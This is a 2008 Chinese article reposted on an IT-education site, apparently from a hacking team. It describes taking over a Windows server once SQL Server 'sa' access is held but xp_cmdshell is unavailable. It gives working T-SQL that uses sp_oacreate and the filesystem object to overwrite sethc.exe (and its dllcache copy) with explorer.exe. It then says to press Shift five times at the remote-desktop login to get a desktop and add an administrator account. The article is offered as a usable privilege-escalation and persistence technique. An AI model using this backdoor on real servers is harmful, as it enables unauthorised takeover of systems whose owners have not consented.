sa 无xp_cmdshell下取权限又一简单方法

编辑:王南来源:邪恶八进制信息安全团队日期:2008-02-07 我要投稿 家园

有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下，可用此方法。（很多服务器都把wscript.shell给删了。）
看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。
上网找了些资料，得到下面方法：
复制文件：

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

成功后3389登陆按五次shift键。成功进入服务器。一直向上点“我的电脑”右键“管理” 用户管理直接加用户。
此法随无技术可言，希望对某些人有点用。

上一篇：后门技术及rootkit工具－Knark分析及防范(二)
下一篇：重启远程终端服务的三个方法

关键字：

【文章评论】【收藏本文】【推荐好友】【打印本文】【论坛讨论】

PERL铸造多线程+支持中文破解SQL自动注入猜解机

看黑客怎样汇编创建简单的窗口

破解数据库下载漏洞

文章评论:(0条)

请留名：匿名评论点击查看所有评论

责任编辑:IT学院声明：刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。

关于我们 - 联系我们 - 网站留言 - 友情链接 - 免责声明 - 网站地图 - RSS订阅 - 返回顶部

国内专业的IT学院，河北亿唐科技提供带宽。

sa 无xp_cmdshell下取权限又一简单方法

编辑:王南 来源:邪恶八进制信息安全团队 日期:2008-02-07 我要投稿 家园

编辑:王南来源:邪恶八进制信息安全团队日期:2008-02-07 我要投稿家园